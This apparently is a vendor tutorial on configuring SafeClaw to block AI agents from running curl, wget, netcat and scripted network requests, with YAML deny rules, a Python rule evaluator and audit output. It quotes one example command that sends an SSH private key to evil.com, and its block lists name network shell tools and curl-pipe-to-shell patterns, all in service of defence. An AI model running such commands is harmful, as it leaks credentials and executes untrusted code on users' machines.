2026-01-12 · Authensor

How to Stop AI Agents from Running curl or wget Commands

SafeClaw by Authensor blocks AI agents from executing curl, wget, and other network transfer commands through deny-by-default action gating. Every shell command is checked against your policy before execution, and network utilities are denied unless you create an explicit exception. Install with npx @authensor/safeclaw and outbound network access via CLI tools is blocked immediately.

Why curl and wget Are Dangerous

curl and wget give an AI agent the ability to download and execute arbitrary code from the internet, send data to external servers (data exfiltration), interact with APIs using your credentials, and fetch malicious payloads. An agent running curl -X POST https://evil.com -d @~/.ssh/id_rsa could exfiltrate your SSH private key in a single command.

Even seemingly innocent uses — like downloading a library or fetching documentation — can be vectors for supply chain attacks or unintended data leakage.

Step 1: Install SafeClaw

npx @authensor/safeclaw

Zero dependencies, MIT licensed. Works with Claude, OpenAI, and all agent frameworks.

Step 2: Block Network Transfer Commands

# safeclaw.policy.yaml
rules:
  - action: shell.execute
    command_pattern: "curl *"
    effect: deny
    reason: "Block curl — prevents data exfiltration and arbitrary downloads"

  - action: shell.execute
    command_pattern: "wget *"
    effect: deny
    reason: "Block wget — prevents arbitrary file downloads"

  - action: shell.execute
    command_pattern: "fetch *"
    effect: deny
    reason: "Block fetch (BSD systems)"

  - action: shell.execute
    command_pattern: "aria2c *"
    effect: deny
    reason: "Block aria2 download manager"

  - action: shell.execute
    command_pattern: "httpie *"
    effect: deny
    reason: "Block httpie HTTP client"

  - action: shell.execute
    command_pattern: "http *"
    effect: deny
    reason: "Block http command (httpie shorthand)"

Step 3: Block Scripting-Based Network Access

An agent might bypass curl by using built-in scripting tools for network requests:

rules:
  - action: shell.execute
    command_pattern: "python -c urllib*"
    effect: deny
    reason: "Block Python urllib-based network requests"

  - action: shell.execute
    command_pattern: "python -c requests*"
    effect: deny
    reason: "Block Python requests-based network requests"

  - action: shell.execute
    command_pattern: "node -e fetch"
    effect: deny
    reason: "Block Node.js fetch-based network requests"

  - action: shell.execute
    command_pattern: "ruby -e Net::HTTP"
    effect: deny
    reason: "Block Ruby HTTP requests"

  - action: shell.execute
    command_pattern: "nc *"
    effect: deny
    reason: "Block netcat connections"

  - action: shell.execute
    command_pattern: "ncat *"
    effect: deny
    reason: "Block ncat connections"

  - action: shell.execute
    command_pattern: "socat *"
    effect: deny
    reason: "Block socat connections"

Step 4: Block Pipe-to-Shell Patterns

The most dangerous pattern is piping a downloaded script directly into a shell:

rules:
  - action: shell.execute
    command_pattern: "curl * | sh"
    effect: deny
    reason: "Block curl-pipe-to-shell (extreme risk)"

  - action: shell.execute
    command_pattern: "curl * | bash"
    effect: deny
    reason: "Block curl-pipe-to-bash"

  - action: shell.execute
    command_pattern: "wget * -O - | sh"
    effect: deny
    reason: "Block wget-pipe-to-shell"

These commands are already denied by the blanket curl and wget rules from Step 2, but listing them explicitly, and placing them ahead of the blanket rules so that first-match-wins reaches them, makes the audit trail record the specific reason a command was blocked.

Step 5: Allow Specific URLs (Optional)

If your agent needs to fetch data from a trusted API endpoint:

rules:
  - action: shell.execute
    command_pattern: "curl https://api.github.com/repos/*/releases/latest"
    effect: allow
    conditions:
      - human_approval: required
    reason: "Allow checking latest release from GitHub with approval"

  # Block all other curl usage
  - action: shell.execute
    command_pattern: "curl *"
    effect: deny
    reason: "Block all other curl commands"

With first-match-wins, the specific GitHub URL is allowed (with human approval) while all other curl usage is denied.
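The following toy evaluator is an added example, not SafeClaw's own code: it applies the Step 5 rules with first-match-wins and falls back to deny when nothing matches, showing why the narrow allow must precede the blanket deny. It assumes command_pattern is matched as a case-sensitive fnmatch-style glob; the real matcher is not documented on this page.

```python
from fnmatch import fnmatchcase

# Rules mirror the Step 5 policy (narrow allow first, blanket deny second),
# plus the wget deny from Step 2. Field names follow the page's YAML.
RULES = [
    {"action": "shell.execute",
     "command_pattern": "curl https://api.github.com/repos/*/releases/latest",
     "effect": "allow",
     "conditions": [{"human_approval": "required"}],
     "reason": "Allow checking latest release from GitHub with approval"},
    {"action": "shell.execute", "command_pattern": "curl *",
     "effect": "deny", "reason": "Block all other curl commands"},
    {"action": "shell.execute", "command_pattern": "wget *",
     "effect": "deny", "reason": "Block wget - prevents arbitrary file downloads"},
]


def evaluate(action, command, rules=RULES):
    """Return (effect, reason, needs_approval) from the first rule whose action
    and command_pattern both match. If no rule matches, deny by default.

    ASSUMPTION: patterns are case-sensitive fnmatch globs, where '*' also
    spans '/'. Confirm how the real policy engine treats globs before relying
    on a URL-shaped allow pattern."""
    for rule in rules:
        if rule["action"] != action:
            continue
        if fnmatchcase(command, rule["command_pattern"]):
            needs_approval = any(
                cond.get("human_approval") == "required"
                for cond in rule.get("conditions", [])
            )
            return rule["effect"], rule["reason"], needs_approval
    return "deny", "default deny: no rule matched", False


def audit_line(action, command, rules=RULES):
    """Format a decision in the style of the Step 6 log output."""
    effect, reason, needs_approval = evaluate(action, command, rules)
    if effect == "deny":
        tag = "DENIED"
    else:
        tag = "ALLOWED, human approval required" if needs_approval else "ALLOWED"
    return f'[{tag}] {action}: "{command}"\n  Rule: "{reason}"'


if __name__ == "__main__":
    github = "curl https://api.github.com/repos/octocat/Hello-World/releases/latest"
    print(audit_line("shell.execute", github))                      # allowed with approval
    print(audit_line("shell.execute", "curl https://example.com/file.tar.gz -o /tmp/file.tar.gz"))
    print(audit_line("shell.execute", "/usr/bin/curl https://example.com"))  # default deny
    # Ordering matters: with the blanket deny first, the GitHub allow never fires.
    print(audit_line("shell.execute", github, rules=list(reversed(RULES))))
```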

Step 6: Test and Audit

npx @authensor/safeclaw --simulate

Ask your agent to download a file. The log confirms:

[DENIED] shell.execute: "curl https://example.com/file.tar.gz -o /tmp/file.tar.gz"
  Rule: "Block curl — prevents data exfiltration and arbitrary downloads"

Check the hash-chained audit trail:

npx @authensor/safeclaw audit --filter "command_pattern:curl"

SafeClaw is open-source with 446 tests and works with both Claude and OpenAI providers. Every network command attempt is logged in the tamper-proof audit chain.
